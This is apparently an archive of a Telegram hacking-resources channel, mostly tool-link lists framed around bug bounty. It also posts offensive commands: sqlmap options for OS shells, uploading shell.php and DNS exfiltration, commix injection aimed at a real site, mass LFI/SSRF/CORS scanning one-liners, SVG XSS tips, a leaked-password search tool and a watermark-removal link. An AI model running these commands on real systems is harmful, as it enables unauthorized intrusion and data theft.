Termux All Command [Telegram Group]
Kanalga Telegramโda oโtish
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Ko'proq ko'rsatish1 186
Obunachilar
+324 soatlar
+187 kunlar
+4830 kunlar
Postlar arxiv
Download shutterstock images without watermark
Link :- Click here
๐ฆ๐๐ฒ๐ฝ ๐ญ - ๐ฃ๐ฟ๐ฎ๐ฐ๐๐ถ๐ฐ๐ฎ๐น ๐๐๐ด ๐๐ผ๐๐ป๐๐ ๐๐ผ๐๐ฟ๐๐ฒ: Start here! This course will give you a solid foundation in web app exploitation and sharpen your bug bounty skills.
๐ฆ๐๐ฒ๐ฝ ๐ฎ - ๐ฃ๐ฟ๐ฎ๐ฐ๐๐ถ๐ฐ๐ฎ๐น ๐ช๐ฒ๐ฏ ๐ฃ๐ฒ๐ป๐๐ฒ๐๐ ๐๐๐๐ผ๐ฐ๐ถ๐ฎ๐๐ฒ (๐ฃ๐ช๐ฃ๐) ๐๐
๐ฎ๐บ: Modeled after real-world scenarios, this exam will put your knowledge to the test and prepare you for the next level!
๐ฆ๐๐ฒ๐ฝ ๐ฏ - ๐ฃ๐ฟ๐ฎ๐ฐ๐๐ถ๐ฐ๐ฎ๐น ๐ช๐ฒ๐ฏ ๐๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด ๐๐ผ๐๐ฟ๐๐ฒ: Once youโve aced the PWPA, dive deeper into Practical Web Hacking, where you'll tackle vulnerabilities and learn remediation techniques.
๐ฆ๐๐ฒ๐ฝ ๐ฐ - ๐ฃ๐ฟ๐ฎ๐ฐ๐๐ถ๐ฐ๐ฎ๐น ๐๐ฃ๐ ๐๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด ๐๐ผ๐๐ฟ๐๐ฒ: Now, itโs time to focus on APIs! In this course, youโll perform attacks against vulnerable API endpoints, prepping you for the final step.
๐ฆ๐๐ฒ๐ฝ ๐ฑ - ๐ง๐ต๐ฒ ๐ฃ๐ช๐ฃ๐ฃ ๐๐
๐ฎ๐บ: Youโre ready for the big challengeโthe PWPP Exam! Test everything you've learned with real-world scenarios and level up as a web app pentester.
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
๐ธ Pentesting Websites ๐ธ
๐ฏ SqlInjection:
โช๏ธhttps://github.com/Neohapsis/bbqsql
โช๏ธhttps://github.com/libeclipse/blind-sql-bitshifting
โช๏ธhttps://github.com/sqlmapproject/sqlmap
โช๏ธhttps://github.com/HandsomeCam/Absinthe
๐ค Pentest Framework
โช๏ธhttps://github.com/trustedsec/ptf
โช๏ธhttps://github.com/georgiaw/Smartphone-Pentest-Framework
โช๏ธhttps://github.com/dloss/python-pentest-tools
โช๏ธhttps://github.com/enaqx/awesome-pentest
โช๏ธhttps://github.com/PenturaLabs/Linux_Exploit_Suggester
๐ Webapp
โช๏ธhttp://www.websecurify.com/
โช๏ธhttps://www.netsparker.com/
โช๏ธhttp://www.acunetix.com/vulnerability-scanner/
โช๏ธhttps://www.rapid7.com/products/nexpose/
โช๏ธhttp://www.tenable.com/products/nessus-vulnerability-scanner
โช๏ธhttps://secapps.com/
โช๏ธhttps://github.com/Arachni/arachni
โช๏ธhttps://github.com/leebaird/discover/blob/master/discover.sh
๐ฅ Web exploitation
โช๏ธhttps://github.com/1N3/Sn1per
WPScan ( https://wpscan.org/ )
Black box WordPress vulnerability scanner ( https://t.me/ViperZCrew/14001 )
โช๏ธhttps://github.com/RUB-NDS/WS-Attacker
SQLmap - Automatic SQL injection and database takeover tool ( sqlmap.org )
weevely3 - Weaponized web shell ( https://github.com/epinna/weevely3 )
Wappalyzer - Wappalyzer uncovers the technologies used on websites ( https://github.com/AliasIO/Wappalyzer )
cms-explorer - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. ( https://github.com/FlorianHeigl/cms-explorer )
joomscan - Joomla CMS scanner ( https://github.com/rezasp/joomscan.git )
WhatWeb - Website Fingerprinter ( https://github.com/urbanadventurer/WhatWeb )
BlindElephant - Web Application Fingerprinter ( https://github.com/lokifer/BlindElephant )
๐ง Complete Bug Bounty tool List ๐ง
๐ง dnscan
https://github.com/rbsec/dnscan
๐ง Knockpy
https://github.com/guelfoweb/knock
๐ง Sublist3r
https://github.com/aboul3la/Sublist3r
๐ง massdns
https://github.com/blechschmidt/massdns
๐ง nmap
https://nmap.org
๐ง masscan
https://github.com/robertdavidgraham/masscan
๐ง EyeWitness
https://github.com/ChrisTruncer/EyeWitness
๐ง DirBuster
https://sourceforge.net/projects/dirbuster/
๐ง dirsearch
https://github.com/maurosoria/dirsearch
๐ง Gitrob
https://github.com/michenriksen/gitrob
๐ง git-secrets
https://github.com/awslabs/git-secrets
๐ง sandcastle
https://github.com/yasinS/sandcastle
๐ง bucket_finder
https://digi.ninja/projects/bucket_finder.php
๐ง GoogD0rker
https://github.com/ZephrFish/GoogD0rker/
๐ง Wayback Machine
https://web.archive.org
๐ง waybackurls
https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
๐ง Sn1per
https://github.com/1N3/Sn1per/
๐ง XRay
https://github.com/evilsocket/xray
๐ง wfuzz
https://github.com/xmendez/wfuzz/
๐ง patator
https://github.com/lanjelot/patator
๐ง datasploit
https://github.com/DataSploit/datasploit
๐ง hydra
https://github.com/vanhauser-thc/thc-hydra
๐ง changeme
https://github.com/ztgrace/changeme
๐ง MobSF
https://github.com/MobSF/Mobile-Security-Framework-MobSF/
๐ง Apktool
https://github.com/iBotPeaches/Apktool
๐ง dex2jar
https://sourceforge.net/projects/dex2jar/
๐ง sqlmap
http://sqlmap.org/
๐ง oxml_xxe
https://github.com/BuffaloWill/oxml_xxe/
๐ง XXE Injector
https://github.com/enjoiz/XXEinjector
๐ง The JSON Web Token Toolkit
https://github.com/ticarpi/jwt_tool
๐ง ground-control
https://github.com/jobertabma/ground-control
๐ง ssrfDetector
https://github.com/JacobReynolds/ssrfDetector
๐ง LFISuit
https://github.com/D35m0nd142/LFISuite
๐ง GitTools
https://github.com/internetwache/GitTools
๐ง dvcs-ripper
https://github.com/kost/dvcs-ripper
๐ง tko-subs
https://github.com/anshumanbh/tko-subs
๐งHostileSubBruteforcer
https://github.com/nahamsec/HostileSubBruteforcer
๐ง Race the Web
https://github.com/insp3ctre/race-the-web
๐ง ysoserial
https://github.com/GoSecure/ysoserial
๐ง PHPGGC
https://github.com/ambionics/phpggc
๐ง CORStest
https://github.com/RUB-NDS/CORStest
๐ง retire-js
https://github.com/RetireJS/retire.js
๐ง getsploit
https://github.com/vulnersCom/getsploit
๐ง Findsploit
https://github.com/1N3/Findsploit
๐ง bfac
https://github.com/mazen160/bfac
๐ง WPScan
https://wpscan.org/
๐ง CMSMap
https://github.com/Dionach/CMSmap
๐ง Amass
https://github.com/OWASP/Amass
โโโโโโโโโโโโโ
Share and support ๐ค๐
@new_everything_free ๐
๐ Complete free Bug Bounty tool List for termux and kali linux ๐
โโช๏ธ โช๏ธโ
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
โญ๏ธโญ๏ธโญ๏ธโญ๏ธโญ๏ธ ๐๐๐
ป ๐๐๐
ธ๐
ฒ๐
บ๐ โญ๏ธโญ๏ธโญ๏ธโญ๏ธโญ๏ธ
โ
SQLi with Blind (True/False)
- Time-Based Blind SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=T --time-sec=5
- Boolean-Based Blind SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=B --boolean-based
โ
SQLi with Error-Based
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=E --dbms=mysql --risk=3 --level=5
โ
Union-Based SQL Injection
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --union-cols=1-5 -D database_name -T table_name -C column1,column2 --dump
โ
Out-of-Band (OOB) SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=U --dns-domain="example.com" --level=5 --risk=3
โ
SQLi with WAF Evasion
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --tamper=between --level=5 --risk=3
โ
SQLi Get Shell
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --os-shell --level=5 --risk=3
โ
SQLi with vulnerability File Upload
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --file-write='/path/to/local/shell.php' --file-dest='/var/www/html/shell.php'
โ
Exfiltrate Data using DNS Tunneling
sqlmap -u 'http://127.0.0.1/page.php?id=1' --dns-domain="mydomain.com" --level=5 --risk=3
โ ๏ธ Commix Bug hunting command :
โ
OS Injection (Recommend)
commix -u "https://hackerone.com" --crawl=2 --batch --skip-heuristics --force-ssl --random-agent --tamper=space2comment --os-cmd="ls/id/whoami"
โ
Commix + "SQLmap"
commix -u "https://hackerone.com/" --batch --crawl=2 | grep "=" | tee urls.txt && sqlmap -m urls.txt --batch --random-agent
โ
Commix + "BurpSuite Monitoring"
commix -u "https://hackerone.com/" --crawl=2 --batch --skip-heuristics --force-ssl --random-agent --tamper=space2comment --os-cmd="id/id/whoami" --proxy="http://127.0.0.1:8080"
๐ 100 tools every Web Pentester must know
Burp Suite
OWASP ZAP
Metasploit Framework
sqlmap
Nmap
Dirbuster
WPScan
Arachni
BeEF
Hydra
XSSer
Sqlninja
Cain and Abel
Netcat
THC Hydra
Nikto
Skipfish
Vega
sqlsus
John the Ripper
THC-SSL-DOS
Sublist3r
Wfuzz
Shodan
Fiddler
sqlmapgui
Wapiti
Yersinia
Tamper Data
WebScarab
Paros
SQL Inject Me
Acunetix
Nessus
Grendel-Scan
Ratproxy
IronWASP
Websecurify
Zed Attack Proxy
Zenmap
NoSQLMap
ODAT
X-Forwarded-For Spoofer
WebSlayer
w3af
Maltego
WPScan Desktop
WP-Scan Vulnerability Database
BruteForcer
JoomScan
Joomfish Scanner
WP Security Audit Log
JoomlaScan
CMSmap
Vega Vulnerability Scanner
Skipfish Web Application Security Scanner
Grabber
DAVScan
bbqsql
Scrawlr
Cewl
Wapiti Web Application Vulnerability Scanner
XssPy
RIPS
Zenmap
WPScan
Arachni
OWASP ZAP
Sqlmap
Nessus
Kali Linux
Acunetix Web Vulnerability Scanner
Nmap
Vega
Metasploit Framework
Hydra
Burp Suite
Nikto
Zed Attack Proxy
Grendel-Scan
Skipfish
Arachni
Wfuzz
Dirbuster
Sqlninja
NoSQLMap
OWASP Mantra
WP-Scanner
XSSer
Metagoofil
Brutus
RainbowCrack
THC-Hydra
Medusa
THC-SSL-DOS
OpenVAS
WP-Scan Vulnerability Database
WPScan Desktop
LFI Suite
XssPy
โโโโโโโโโโโโโโโ
๐จโ๐ป BUG BOUNTY WITH ONE-LINE BASH SCRIPTS ๐ต๏ธ
๐๐๐ โชผ
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
๐๐๐๐ข โชผ
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
๐๐๐๐
โชผ
findomain -t http://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace ๐ฉ๐ต๐ต๐ฑ://๐ ๐๐๐.๐ฃ๐ถ๐ณ๐ฑ๐ค๐ฐ๐ญ๐ญ๐ข๐ฃ๐ฐ๐ณ๐ข๐ต๐ฐ๐ณ.๐ฏ๐ฆ๐ต
๐๐
๐ โชผ
gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
๐๐๐๐ ๐๐๐๐๐๐๐๐ โชผ
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
๐๐๐๐๐๐๐๐๐ ๐๐๐๐๐๐๐๐๐ โชผ
subfinder -d http://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
๐๐๐๐ โชผ
gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
๐๐ฑ๐ญ๐ซ๐๐๐ญ .๐ฃ๐ฌ โชผ
echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
๐๐ฑ๐ญ๐ซ๐๐๐ญ ๐๐๐๐ฌ ๐๐ซ๐จ๐ฆ ๐๐จ๐ฆ๐ฆ๐๐ง๐ญ โชผ
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
๐๐ฎ๐ฆ๐ฉ ๐๐ง-๐ฌ๐๐จ๐ฉ๐ ๐๐ฌ๐ฌ๐๐ญ๐ฌ ๐๐ซ๐จ๐ฆ ๐๐๐๐ค๐๐ซ๐๐ง๐ โชผ
curl -sL ๐ฉ๐ต๐ต๐ฑ๐ด://๐จ๐ช๐ต๐ฉ๐ถ๐ฃ.๐ค๐ฐ๐ฎ/๐ข๐ณ๐ฌ๐ข๐ฅ๐ช๐บ๐ต/๐ฃ๐ฐ๐ถ๐ฏ๐ต๐บ-๐ต๐ข๐ณ๐จ๐ฆ๐ต๐ด-๐ฅ๐ข๐ต๐ข/๐ฃ๐ญ๐ฐ๐ฃ/๐ฎ๐ข๐ด๐ต๐ฆ๐ณ/๐ฅ๐ข๐ต๐ข/๐ฉ๐ข๐ค๐ฌ๐ฆ๐ณ๐ฐ๐ฏ๐ฆ_๐ฅ๐ข๐ต๐ข.๐ซ๐ด๐ฐ๐ฏ?๐ณ๐ข๐ธ=๐ต๐ณ๐ถ๐ฆ | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
๐
๐ข๐ง๐ ๐ฅ๐ข๐ฏ๐ ๐ก๐จ๐ฌ๐ญ/๐๐จ๐ฆ๐๐ข๐ง/๐๐ฌ๐ฌ๐๐ญ๐ฌ โชผ
subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
๐๐๐ซ๐๐๐ง๐ฌ๐ก๐จ๐ญ โชผ
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
๐จ Essential Mind Maps for Bug Hunters!
Boost your bug bounty skills with Mind-Maps Repository by Imran Parray.
Topics include:
Bug Hunting Methodology
2FA & OAuth Testing
SSRF, Server-side Issues, and more!
๐ Explore here: https://lnkd.in/g-_jwEGM
Subdosec - Subdomain takeover scanner
CLI : https://lnkd.in/gmW-nth3
Web Based : https://lnkd.in/gxn2AmHA
OSINT tool for searching people's digital footprint and leaked passwords across various social networks, written in Go. : https://github.com/ibnaleem/gosearch
๐ LINUX BASIC COMMANDS ๐จ
File and Directory Management:
1. ls: List files and directories.
2. cd: Change directory.
3. pwd: Display the current directory.
4. mkdir: Create a new directory.
5. rm: Remove files or directories.
6. cp: Copy files or directories.
7. mv: Move or rename files.
8. touch: Create an empty file.
9. tree: Display directory structure.
File Viewing and Editing:
10. cat: Display file content.
11. less / more: View files page by page.
12. head: Show the first 10 lines.
13. tail: Show the last 10 lines.
14. nano: A simple text editor.
15. vi / vim: An advanced text editor.
Search Operations:
16. find: Locate files and directories.
17. grep: Search within files.
18. locate: Quickly find files using a database.
19. which: Locate a commandโs path.
Disk and File System Management:
20. df: Display disk space usage.
21. du: Show directory or file size.
22. mount / umount: Mount or unmount file systems.
23. lsblk: List all block devices.
24. fsck: Check and repair file systems.
Process and System Monitoring:
25. ps: Display running processes.
26. top: Monitor system processes.
27. htop: Interactive process manager.
28. kill: Terminate a process.
29. uptime: Show system uptime.
30. free: Check memory usage.
Networking Commands:
31. ping: Check connectivity.
32. curl: Transfer data to/from servers.
33. wget: Download files from the internet.
34. ifconfig / ip: View or configure network interfaces.
35. netstat: Show network statistics.
36. ssh: Remote access to servers.
37. SCP: Securely Copy Files Between Systems
Permissions and Ownership:
38. chmod: Modify file permissions
39. chown: Change file owner/group
40. umask: Set default permissions
Archiving and Compression:
41. tar: Archive and compress files
42. gzip/gunzip: Compress and decompress files
43. zip/unzip: Handle zip files
System Information:
44. uname -a: Show system information
45. hostname: Display system hostname
46. whoami: Current user
47. id: Show user and group IDs
48. dmesg: Kernel log messages
49. lscpu: CPU architecture information
50. lsusb: List USB devices
51. lspci: Show PCI devices
hashtag#linux
hashtag#commands
hashtag#serversupport
hashtag#supportexecutive
hashtag#monitoring
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
hashtag#web hashtag#sqli
now its become so easy for making notes from any youtube video just type study.lol/ in front of any youtube video like study.lol/https://youtubevideolink it will give u all video summary and amazing question answer in flashcards try it(not a promo i just found it yesterday and found it useful)
๐ ๏ธ 20 Very Advanced Information Gathering Tools ๐ ๏ธ
1. Nmap
โค Network Scanner
๐ github.com/nmap/nmap
2. Maltego
โค Visual Link Analysis
๐ maltego.com
3. Shodan
โค IoT Search Engine
๐ github.com/m4ll0k/Shodanfy.py
4. Recon-ng
โค Web Reconnaissance Framework
๐ github.com/lanmaster53/recon-ng
5. Spiderfoot
โค OSINT Automation Tool
๐ github.com/smicallef/spiderfoot
6. theHarvester
โค Email and Subdomain Gatherer
๐ github.com/laramies/theHarvester
7. Amass
โค Network Mapping of Attack Surfaces
๐ github.com/OWASP/Amass
8. RED HAWK
โค All-In-One Scanning Tool
๐ github.com/Tuhinshubhra/RED_HAWK
9. ReconSpider
โค Multi-purpose Gathering Tool
๐ github.com/bhavsec/reconspider
10. OSINT Framework
โค Comprehensive Information Gathering Collection
๐ github.com/lockfale/OSINT-Framework
11. Infoga
โค Email OSINT Gatherer
๐ github.com/m4ll0k/Infoga
12. Striker
โค Offensive Information Gathering Tool
๐ github.com/s0md3v/Striker
13. SecretFinder
โค API Key and Secret Finder
๐ github.com/m4ll0k/SecretFinder
14. Xerosploit
โค Penetration Testing Toolkit
๐ github.com/LionSec/xerosploit
15. FOCA
โค Metadata Analyzer
๐ github.com/ElevenPaths/FOCA
16. ReconDog
โค Reconnaissance Swiss Army Knife
๐ github.com/s0md3v/ReconDog
17. Metagoofil
โค Metadata Extractor
๐ github.com/laramies/metagoofil
18. Dracnmap
โค Nmap Script Wrapper
๐ github.com/Screetsec/Dracnmap
19. Rang3r
โค Multi-threaded Port Scanner
๐ github.com/floriankunushevci/rang3r
20. Breacher
โค Admin Panel Finder
๐ github.com/s0md3v/Breacher
๐ Stay tuned for more advanced tools & guides
๐ Follow us for daily updates on cybersecurity
๐ฅ Join our channel for more insights!
https://t.me/teammatrixs
Website Security
Urlscan.io - URL and website scanner
โhttps://urlscan.io/
VirusTotal URL Search
VirusTotal
โhttps://www.virustotal.com/gui/home/url
Threat Intelligence Platform
โhttps://threatintelligenceplatform.com/
Is This Website Safe
โhttps://safeweb.norton.com/
Safe Browsing site status
โhttps://transparencyreport.google.com/safe-browsing/search?hl=en
WHOIS IP Lookup Tool
โhttps://www.ultratools.com/tools/ipWhoisLookupResult
Find Website IP Address
โhttps://www.ipvoid.com/find-website-ip/
IP Address Blacklist Check
โhttps://www.ipvoid.com/ip-blacklist-check/
Check The Websiteโs SSL Certificate
See Your Entire Attack Surface in Real-Time. Get a current view of all of your organization's assets so you can proactively prevent targeted attacks and investigate suspicious activity.
โhttps://censys.io/ipv4
SpiderFoot
โhttps://www.spiderfoot.net/
Tools for Looking up Malicious Websites
โhttps://zeltser.com/lookup-malicious-websites/
How to Tell if a Website is Dangerous
โhttps://www.secjuice.com/how-to-tell-if-a-website-is-dangerous/
Malicious URL Scanner
โhttps://www.ipqualityscore.com/threat-feeds/malicious-url-scanner
Threatlog - Malicious Domains Database
Database of malicious domains, fraudulent and phishing domains, malware domains database, threat intelligence feeds, detect potentially malicious domains.
โhttps://www.threatlog.com/
Opswat - MetaDefender Cloud
Cloud-based Deep CDR, Multiscanning, Sandbox Dynamic Analysis, Hash and IP-Domain reputation with options for personal and commercial users.
โhttps://metadefender.opswat.com/
Tools for searching emails for a specific domain:
https://lnkd.in/dNRbh9dh
https://lnkd.in/dUS7g_Xc
https://lnkd.in/dx-dgVRB
https://www.infoga.io/
https://findemail.io/
https://lnkd.in/djBBAa6j
https://lnkd.in/daVsYTts
https://minelead.io/
Discovered Information Disclosure Vulnerability via Directory and File Disclosure ๐
~Tip: Add the file
/unstable/ to your wordlist, and you might discover some juicy data. ๐ก
Enjoy! ๐
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
